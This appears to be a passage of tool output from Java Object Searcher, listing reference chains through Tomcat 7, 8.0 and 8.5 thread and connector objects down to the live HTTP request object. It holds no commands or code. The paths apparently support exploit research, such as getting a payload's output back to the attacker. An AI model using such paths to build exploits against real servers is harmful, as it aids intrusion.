173 | ---> global = {org.apache.coyote.RequestGroupInfo}
174 | ---> processors = {java.util.ArrayList}
175 | ---> [0] = {org.apache.coyote.RequestInfo}
176 | ---> req = {org.apache.coyote.Request}
177 | ---> notes = {class [Ljava.lang.Object;}
178 | ---> [1] = {org.apache.catalina.connector.Request}
179 | ---> specialAttributes = {java.util.Map}
180 | ---> [org.apache.catalina.realm.GSS_CREDENTIAL] = {org.apache.catalina.connector.Request$4}
181 |
182 |
183 |
--------------------------------------------------------------------------------
/Tomcat/Java Object Searcher search result/tomcat 7.0.96 result.txt:
--------------------------------------------------------------------------------
1 | #############################################################
2 | Java Object Searcher v0.01
3 | author: c0ny1
4 | github: http://github.com/c0ny1/java-object-searcher
5 | #############################################################
6 |
7 |
8 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
9 | ---> group = {java.lang.ThreadGroup}
10 | ---> threads = {class [Ljava.lang.Thread;}
11 | ---> [13] = {java.lang.Thread}
12 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
13 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
14 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
15 | ---> global = {org.apache.coyote.RequestGroupInfo}
16 |
17 |
18 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
19 | ---> group = {java.lang.ThreadGroup}
20 | ---> threads = {class [Ljava.lang.Thread;}
21 | ---> [27] = {java.lang.Thread}
22 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
23 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
24 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
25 | ---> global = {org.apache.coyote.RequestGroupInfo}
26 |
27 |
28 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
29 | ---> group = {java.lang.ThreadGroup}
30 | ---> threads = {class [Ljava.lang.Thread;}
31 | ---> [39] = {java.lang.Thread}
32 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
33 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
34 | ---> handler = {org.apache.coyote.ajp.AjpAprProtocol$AjpConnectionHandler}
35 | ---> global = {org.apache.coyote.RequestGroupInfo}
36 |
37 |
38 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
39 | ---> group = {java.lang.ThreadGroup}
40 | ---> threads = {class [Ljava.lang.Thread;}
41 | ---> [13] = {java.lang.Thread}
42 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
43 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
44 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
45 | ---> global = {org.apache.coyote.RequestGroupInfo}
46 | ---> processors = {java.util.ArrayList}
47 | ---> [0] = {org.apache.coyote.RequestInfo}
48 |
49 |
50 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
51 | ---> group = {java.lang.ThreadGroup}
52 | ---> threads = {class [Ljava.lang.Thread;}
53 | ---> [2] = {java.lang.Thread}
54 | ---> target = {org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor}
55 | ---> this$0 = {org.apache.catalina.core.StandardEngine}
56 | ---> children = {java.util.HashMap}
57 | ---> [localhost] = {org.apache.catalina.core.StandardHost}
58 | ---> pipeline = {org.apache.catalina.core.StandardPipeline}
59 | ---> first = {org.apache.catalina.valves.AccessLogValve}
60 | ---> logElements = {class [Lorg.apache.catalina.valves.AccessLogValve$AccessLogElement;}
61 | ---> [9] = {org.apache.catalina.valves.AccessLogValve$RequestElement}
62 |
63 |
64 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
65 | ---> group = {java.lang.ThreadGroup}
66 | ---> threads = {class [Ljava.lang.Thread;}
67 | ---> [13] = {java.lang.Thread}
68 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
69 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
70 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
71 | ---> global = {org.apache.coyote.RequestGroupInfo}
72 | ---> processors = {java.util.ArrayList}
73 | ---> [0] = {org.apache.coyote.RequestInfo}
74 | ---> req = {org.apache.coyote.Request}
75 |
76 |
77 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
78 | ---> group = {java.lang.ThreadGroup}
79 | ---> threads = {class [Ljava.lang.Thread;}
80 | ---> [13] = {java.lang.Thread}
81 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
82 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
83 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
84 | ---> global = {org.apache.coyote.RequestGroupInfo}
85 | ---> processors = {java.util.ArrayList}
86 | ---> [0] = {org.apache.coyote.RequestInfo}
87 | ---> req = {org.apache.coyote.Request}
88 | ---> notes = {class [Ljava.lang.Object;}
89 | ---> [1] = {org.apache.catalina.connector.Request}
90 |
91 |
92 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
93 | ---> group = {java.lang.ThreadGroup}
94 | ---> threads = {class [Ljava.lang.Thread;}
95 | ---> [13] = {java.lang.Thread}
96 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
97 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
98 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
99 | ---> global = {org.apache.coyote.RequestGroupInfo}
100 | ---> processors = {java.util.ArrayList}
101 | ---> [0] = {org.apache.coyote.RequestInfo}
102 | ---> req = {org.apache.coyote.Request}
103 | ---> notes = {class [Ljava.lang.Object;}
104 | ---> [1] = {org.apache.catalina.connector.Request}
105 | ---> facade = {org.apache.catalina.connector.RequestFacade}
106 |
107 |
108 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
109 | ---> group = {java.lang.ThreadGroup}
110 | ---> threads = {class [Ljava.lang.Thread;}
111 | ---> [13] = {java.lang.Thread}
112 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
113 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
114 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
115 | ---> global = {org.apache.coyote.RequestGroupInfo}
116 | ---> processors = {java.util.ArrayList}
117 | ---> [0] = {org.apache.coyote.RequestInfo}
118 | ---> req = {org.apache.coyote.Request}
119 | ---> notes = {class [Ljava.lang.Object;}
120 | ---> [1] = {org.apache.catalina.connector.Request}
121 | ---> specialAttributes = {java.util.Map}
122 | ---> [org.apache.catalina.parameter_parse_failed_reason] = {org.apache.catalina.connector.Request$6}
123 |
124 |
125 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
126 | ---> group = {java.lang.ThreadGroup}
127 | ---> threads = {class [Ljava.lang.Thread;}
128 | ---> [13] = {java.lang.Thread}
129 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
130 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
131 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
132 | ---> global = {org.apache.coyote.RequestGroupInfo}
133 | ---> processors = {java.util.ArrayList}
134 | ---> [0] = {org.apache.coyote.RequestInfo}
135 | ---> req = {org.apache.coyote.Request}
136 | ---> notes = {class [Ljava.lang.Object;}
137 | ---> [1] = {org.apache.catalina.connector.Request}
138 | ---> specialAttributes = {java.util.Map}
139 | ---> [org.apache.catalina.core.DISPATCHER_TYPE] = {org.apache.catalina.connector.Request$1}
140 |
141 |
142 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
143 | ---> group = {java.lang.ThreadGroup}
144 | ---> threads = {class [Ljava.lang.Thread;}
145 | ---> [13] = {java.lang.Thread}
146 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
147 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
148 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
149 | ---> global = {org.apache.coyote.RequestGroupInfo}
150 | ---> processors = {java.util.ArrayList}
151 | ---> [0] = {org.apache.coyote.RequestInfo}
152 | ---> req = {org.apache.coyote.Request}
153 | ---> notes = {class [Ljava.lang.Object;}
154 | ---> [1] = {org.apache.catalina.connector.Request}
155 | ---> specialAttributes = {java.util.Map}
156 | ---> [org.apache.catalina.ASYNC_SUPPORTED] = {org.apache.catalina.connector.Request$3}
157 |
158 |
159 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
160 | ---> group = {java.lang.ThreadGroup}
161 | ---> threads = {class [Ljava.lang.Thread;}
162 | ---> [13] = {java.lang.Thread}
163 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
164 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
165 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
166 | ---> global = {org.apache.coyote.RequestGroupInfo}
167 | ---> processors = {java.util.ArrayList}
168 | ---> [0] = {org.apache.coyote.RequestInfo}
169 | ---> req = {org.apache.coyote.Request}
170 | ---> notes = {class [Ljava.lang.Object;}
171 | ---> [1] = {org.apache.catalina.connector.Request}
172 | ---> specialAttributes = {java.util.Map}
173 | ---> [org.apache.catalina.parameter_parse_failed] = {org.apache.catalina.connector.Request$5}
174 |
175 |
176 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
177 | ---> group = {java.lang.ThreadGroup}
178 | ---> threads = {class [Ljava.lang.Thread;}
179 | ---> [13] = {java.lang.Thread}
180 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
181 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
182 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
183 | ---> global = {org.apache.coyote.RequestGroupInfo}
184 | ---> processors = {java.util.ArrayList}
185 | ---> [0] = {org.apache.coyote.RequestInfo}
186 | ---> req = {org.apache.coyote.Request}
187 | ---> notes = {class [Ljava.lang.Object;}
188 | ---> [1] = {org.apache.catalina.connector.Request}
189 | ---> specialAttributes = {java.util.Map}
190 | ---> [org.apache.catalina.core.DISPATCHER_REQUEST_PATH] = {org.apache.catalina.connector.Request$2}
191 |
192 |
193 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
194 | ---> group = {java.lang.ThreadGroup}
195 | ---> threads = {class [Ljava.lang.Thread;}
196 | ---> [13] = {java.lang.Thread}
197 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
198 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
199 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
200 | ---> global = {org.apache.coyote.RequestGroupInfo}
201 | ---> processors = {java.util.ArrayList}
202 | ---> [0] = {org.apache.coyote.RequestInfo}
203 | ---> req = {org.apache.coyote.Request}
204 | ---> notes = {class [Ljava.lang.Object;}
205 | ---> [1] = {org.apache.catalina.connector.Request}
206 | ---> specialAttributes = {java.util.Map}
207 | ---> [org.apache.catalina.realm.GSS_CREDENTIAL] = {org.apache.catalina.connector.Request$4}
208 |
209 |
210 |
--------------------------------------------------------------------------------
/Tomcat/Java Object Searcher search result/tomcat 8.0.48 result.txt:
--------------------------------------------------------------------------------
1 | #############################################################
2 | Java Object Searcher v0.01
3 | author: c0ny1
4 | github: http://github.com/c0ny1/java-object-searcher
5 | #############################################################
6 |
7 |
8 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
9 | ---> group = {java.lang.ThreadGroup}
10 | ---> threads = {class [Ljava.lang.Thread;}
11 | ---> [14] = {java.lang.Thread}
12 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
13 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
14 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
15 | ---> global = {org.apache.coyote.RequestGroupInfo}
16 |
17 |
18 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
19 | ---> group = {java.lang.ThreadGroup}
20 | ---> threads = {class [Ljava.lang.Thread;}
21 | ---> [28] = {java.lang.Thread}
22 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
23 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
24 | ---> handler = {org.apache.coyote.ajp.AjpAprProtocol$AjpConnectionHandler}
25 | ---> global = {org.apache.coyote.RequestGroupInfo}
26 |
27 |
28 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
29 | ---> group = {java.lang.ThreadGroup}
30 | ---> threads = {class [Ljava.lang.Thread;}
31 | ---> [14] = {java.lang.Thread}
32 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
33 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
34 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
35 | ---> global = {org.apache.coyote.RequestGroupInfo}
36 | ---> processors = {java.util.ArrayList}
37 | ---> [0] = {org.apache.coyote.RequestInfo}
38 |
39 |
40 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
41 | ---> group = {java.lang.ThreadGroup}
42 | ---> threads = {class [Ljava.lang.Thread;}
43 | ---> [14] = {java.lang.Thread}
44 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
45 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
46 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
47 | ---> global = {org.apache.coyote.RequestGroupInfo}
48 | ---> processors = {java.util.ArrayList}
49 | ---> [1] = {org.apache.coyote.RequestInfo}
50 |
51 |
52 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
53 | ---> group = {java.lang.ThreadGroup}
54 | ---> threads = {class [Ljava.lang.Thread;}
55 | ---> [3] = {java.lang.Thread}
56 | ---> target = {org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor}
57 | ---> this$0 = {org.apache.catalina.core.StandardEngine}
58 | ---> children = {java.util.HashMap}
59 | ---> [localhost] = {org.apache.catalina.core.StandardHost}
60 | ---> pipeline = {org.apache.catalina.core.StandardPipeline}
61 | ---> first = {org.apache.catalina.valves.AccessLogValve}
62 | ---> logElements = {class [Lorg.apache.catalina.valves.AbstractAccessLogValve$AccessLogElement;}
63 | ---> [9] = {org.apache.catalina.valves.AbstractAccessLogValve$RequestElement}
64 |
65 |
66 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
67 | ---> group = {java.lang.ThreadGroup}
68 | ---> threads = {class [Ljava.lang.Thread;}
69 | ---> [14] = {java.lang.Thread}
70 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
71 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
72 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
73 | ---> global = {org.apache.coyote.RequestGroupInfo}
74 | ---> processors = {java.util.ArrayList}
75 | ---> [0] = {org.apache.coyote.RequestInfo}
76 | ---> req = {org.apache.coyote.Request}
77 |
78 |
79 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
80 | ---> group = {java.lang.ThreadGroup}
81 | ---> threads = {class [Ljava.lang.Thread;}
82 | ---> [14] = {java.lang.Thread}
83 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
84 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
85 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
86 | ---> global = {org.apache.coyote.RequestGroupInfo}
87 | ---> processors = {java.util.ArrayList}
88 | ---> [1] = {org.apache.coyote.RequestInfo}
89 | ---> req = {org.apache.coyote.Request}
90 |
91 |
92 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
93 | ---> group = {java.lang.ThreadGroup}
94 | ---> threads = {class [Ljava.lang.Thread;}
95 | ---> [14] = {java.lang.Thread}
96 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
97 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
98 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
99 | ---> global = {org.apache.coyote.RequestGroupInfo}
100 | ---> processors = {java.util.ArrayList}
101 | ---> [0] = {org.apache.coyote.RequestInfo}
102 | ---> req = {org.apache.coyote.Request}
103 | ---> notes = {class [Ljava.lang.Object;}
104 | ---> [1] = {org.apache.catalina.connector.Request}
105 |
106 |
107 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
108 | ---> group = {java.lang.ThreadGroup}
109 | ---> threads = {class [Ljava.lang.Thread;}
110 | ---> [14] = {java.lang.Thread}
111 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
112 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
113 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
114 | ---> global = {org.apache.coyote.RequestGroupInfo}
115 | ---> processors = {java.util.ArrayList}
116 | ---> [1] = {org.apache.coyote.RequestInfo}
117 | ---> req = {org.apache.coyote.Request}
118 | ---> notes = {class [Ljava.lang.Object;}
119 | ---> [1] = {org.apache.catalina.connector.Request}
120 |
121 |
122 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
123 | ---> group = {java.lang.ThreadGroup}
124 | ---> threads = {class [Ljava.lang.Thread;}
125 | ---> [14] = {java.lang.Thread}
126 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
127 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
128 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
129 | ---> global = {org.apache.coyote.RequestGroupInfo}
130 | ---> processors = {java.util.ArrayList}
131 | ---> [0] = {org.apache.coyote.RequestInfo}
132 | ---> req = {org.apache.coyote.Request}
133 | ---> notes = {class [Ljava.lang.Object;}
134 | ---> [1] = {org.apache.catalina.connector.Request}
135 | ---> facade = {org.apache.catalina.connector.RequestFacade}
136 |
137 |
138 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
139 | ---> group = {java.lang.ThreadGroup}
140 | ---> threads = {class [Ljava.lang.Thread;}
141 | ---> [14] = {java.lang.Thread}
142 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
143 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
144 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
145 | ---> global = {org.apache.coyote.RequestGroupInfo}
146 | ---> processors = {java.util.ArrayList}
147 | ---> [0] = {org.apache.coyote.RequestInfo}
148 | ---> req = {org.apache.coyote.Request}
149 | ---> notes = {class [Ljava.lang.Object;}
150 | ---> [1] = {org.apache.catalina.connector.Request}
151 | ---> specialAttributes = {java.util.Map}
152 | ---> [org.apache.catalina.parameter_parse_failed_reason] = {org.apache.catalina.connector.Request$6}
153 |
154 |
155 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
156 | ---> group = {java.lang.ThreadGroup}
157 | ---> threads = {class [Ljava.lang.Thread;}
158 | ---> [14] = {java.lang.Thread}
159 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
160 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
161 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
162 | ---> global = {org.apache.coyote.RequestGroupInfo}
163 | ---> processors = {java.util.ArrayList}
164 | ---> [0] = {org.apache.coyote.RequestInfo}
165 | ---> req = {org.apache.coyote.Request}
166 | ---> notes = {class [Ljava.lang.Object;}
167 | ---> [1] = {org.apache.catalina.connector.Request}
168 | ---> specialAttributes = {java.util.Map}
169 | ---> [org.apache.tomcat.comet.timeout.support] = {org.apache.catalina.connector.Request$8}
170 |
171 |
172 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
173 | ---> group = {java.lang.ThreadGroup}
174 | ---> threads = {class [Ljava.lang.Thread;}
175 | ---> [14] = {java.lang.Thread}
176 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
177 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
178 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
179 | ---> global = {org.apache.coyote.RequestGroupInfo}
180 | ---> processors = {java.util.ArrayList}
181 | ---> [0] = {org.apache.coyote.RequestInfo}
182 | ---> req = {org.apache.coyote.Request}
183 | ---> notes = {class [Ljava.lang.Object;}
184 | ---> [1] = {org.apache.catalina.connector.Request}
185 | ---> specialAttributes = {java.util.Map}
186 | ---> [org.apache.catalina.core.DISPATCHER_TYPE] = {org.apache.catalina.connector.Request$1}
187 |
188 |
189 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
190 | ---> group = {java.lang.ThreadGroup}
191 | ---> threads = {class [Ljava.lang.Thread;}
192 | ---> [14] = {java.lang.Thread}
193 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
194 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
195 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
196 | ---> global = {org.apache.coyote.RequestGroupInfo}
197 | ---> processors = {java.util.ArrayList}
198 | ---> [0] = {org.apache.coyote.RequestInfo}
199 | ---> req = {org.apache.coyote.Request}
200 | ---> notes = {class [Ljava.lang.Object;}
201 | ---> [1] = {org.apache.catalina.connector.Request}
202 | ---> specialAttributes = {java.util.Map}
203 | ---> [org.apache.catalina.ASYNC_SUPPORTED] = {org.apache.catalina.connector.Request$3}
204 |
205 |
206 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
207 | ---> group = {java.lang.ThreadGroup}
208 | ---> threads = {class [Ljava.lang.Thread;}
209 | ---> [14] = {java.lang.Thread}
210 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
211 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
212 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
213 | ---> global = {org.apache.coyote.RequestGroupInfo}
214 | ---> processors = {java.util.ArrayList}
215 | ---> [0] = {org.apache.coyote.RequestInfo}
216 | ---> req = {org.apache.coyote.Request}
217 | ---> notes = {class [Ljava.lang.Object;}
218 | ---> [1] = {org.apache.catalina.connector.Request}
219 | ---> specialAttributes = {java.util.Map}
220 | ---> [org.apache.tomcat.sendfile.support] = {org.apache.catalina.connector.Request$9}
221 |
222 |
223 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
224 | ---> group = {java.lang.ThreadGroup}
225 | ---> threads = {class [Ljava.lang.Thread;}
226 | ---> [14] = {java.lang.Thread}
227 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
228 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
229 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
230 | ---> global = {org.apache.coyote.RequestGroupInfo}
231 | ---> processors = {java.util.ArrayList}
232 | ---> [0] = {org.apache.coyote.RequestInfo}
233 | ---> req = {org.apache.coyote.Request}
234 | ---> notes = {class [Ljava.lang.Object;}
235 | ---> [1] = {org.apache.catalina.connector.Request}
236 | ---> specialAttributes = {java.util.Map}
237 | ---> [org.apache.tomcat.comet.support] = {org.apache.catalina.connector.Request$7}
238 |
239 |
240 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
241 | ---> group = {java.lang.ThreadGroup}
242 | ---> threads = {class [Ljava.lang.Thread;}
243 | ---> [14] = {java.lang.Thread}
244 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
245 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
246 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
247 | ---> global = {org.apache.coyote.RequestGroupInfo}
248 | ---> processors = {java.util.ArrayList}
249 | ---> [0] = {org.apache.coyote.RequestInfo}
250 | ---> req = {org.apache.coyote.Request}
251 | ---> notes = {class [Ljava.lang.Object;}
252 | ---> [1] = {org.apache.catalina.connector.Request}
253 | ---> specialAttributes = {java.util.Map}
254 | ---> [org.apache.catalina.parameter_parse_failed] = {org.apache.catalina.connector.Request$5}
255 |
256 |
257 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
258 | ---> group = {java.lang.ThreadGroup}
259 | ---> threads = {class [Ljava.lang.Thread;}
260 | ---> [14] = {java.lang.Thread}
261 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
262 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
263 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
264 | ---> global = {org.apache.coyote.RequestGroupInfo}
265 | ---> processors = {java.util.ArrayList}
266 | ---> [0] = {org.apache.coyote.RequestInfo}
267 | ---> req = {org.apache.coyote.Request}
268 | ---> notes = {class [Ljava.lang.Object;}
269 | ---> [1] = {org.apache.catalina.connector.Request}
270 | ---> specialAttributes = {java.util.Map}
271 | ---> [org.apache.catalina.core.DISPATCHER_REQUEST_PATH] = {org.apache.catalina.connector.Request$2}
272 |
273 |
274 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
275 | ---> group = {java.lang.ThreadGroup}
276 | ---> threads = {class [Ljava.lang.Thread;}
277 | ---> [14] = {java.lang.Thread}
278 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
279 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
280 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
281 | ---> global = {org.apache.coyote.RequestGroupInfo}
282 | ---> processors = {java.util.ArrayList}
283 | ---> [0] = {org.apache.coyote.RequestInfo}
284 | ---> req = {org.apache.coyote.Request}
285 | ---> notes = {class [Ljava.lang.Object;}
286 | ---> [1] = {org.apache.catalina.connector.Request}
287 | ---> specialAttributes = {java.util.Map}
288 | ---> [org.apache.catalina.realm.GSS_CREDENTIAL] = {org.apache.catalina.connector.Request$4}
289 |
290 |
291 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
292 | ---> group = {java.lang.ThreadGroup}
293 | ---> threads = {class [Ljava.lang.Thread;}
294 | ---> [14] = {java.lang.Thread}
295 | ---> target = {org.apache.tomcat.util.net.AprEndpoint$Poller}
296 | ---> this$0 = {org.apache.tomcat.util.net.AprEndpoint}
297 | ---> handler = {org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler}
298 | ---> global = {org.apache.coyote.RequestGroupInfo}
299 | ---> processors = {java.util.ArrayList}
300 | ---> [1] = {org.apache.coyote.RequestInfo}
301 | ---> req = {org.apache.coyote.Request}
302 | ---> notes = {class [Ljava.lang.Object;}
303 | ---> [1] = {org.apache.catalina.connector.Request}
304 | ---> facade = {org.apache.catalina.connector.RequestFacade}
305 |
306 |
307 |
--------------------------------------------------------------------------------
/Tomcat/Java Object Searcher search result/tomcat 8.5.53 result.txt:
--------------------------------------------------------------------------------
1 | #############################################################
2 | Java Object Searcher v0.01
3 | author: c0ny1
4 | github: http://github.com/c0ny1/java-object-searcher
5 | #############################################################
6 |
7 |
8 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
9 | ---> group = {java.lang.ThreadGroup}
10 | ---> threads = {class [Ljava.lang.Thread;}
11 | ---> [15] = {java.lang.Thread}
12 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
13 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
14 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
15 | ---> global = {org.apache.coyote.RequestGroupInfo}
16 |
17 |
18 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
19 | ---> group = {java.lang.ThreadGroup}
20 | ---> threads = {class [Ljava.lang.Thread;}
21 | ---> [15] = {java.lang.Thread}
22 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
23 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
24 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
25 | ---> global = {org.apache.coyote.RequestGroupInfo}
26 | ---> processors = {java.util.ArrayList}
27 | ---> [0] = {org.apache.coyote.RequestInfo}
28 |
29 |
30 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
31 | ---> group = {java.lang.ThreadGroup}
32 | ---> threads = {class [Ljava.lang.Thread;}
33 | ---> [15] = {java.lang.Thread}
34 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
35 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
36 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
37 | ---> connections = {java.util.Map}
38 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
39 | ---> request = {org.apache.coyote.Request}
40 |
41 |
42 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
43 | ---> group = {java.lang.ThreadGroup}
44 | ---> threads = {class [Ljava.lang.Thread;}
45 | ---> [15] = {java.lang.Thread}
46 | ---> target = {org.apache.tomcat.util.net.NioEndpoint$Poller}
47 | ---> this$0 = {org.apache.tomcat.util.net.NioEndpoint}
48 | ---> handler = {org.apache.coyote.AbstractProtocol$ConnectionHandler}
49 | ---> connections = {java.util.Map}
50 | ---> [org.apache.tomcat.util.net.NioChannel@39729d0e:java.nio.channels.SocketChannel[connected local=/127.0.0.1:8080 remote=/127.0.0.1:13822]] = {org.apache.coyote.http11.Http11Processor}
51 | ---> request = {org.apache.coyote.Request}
52 | ---> notes = {class [Ljava.lang.Object;}
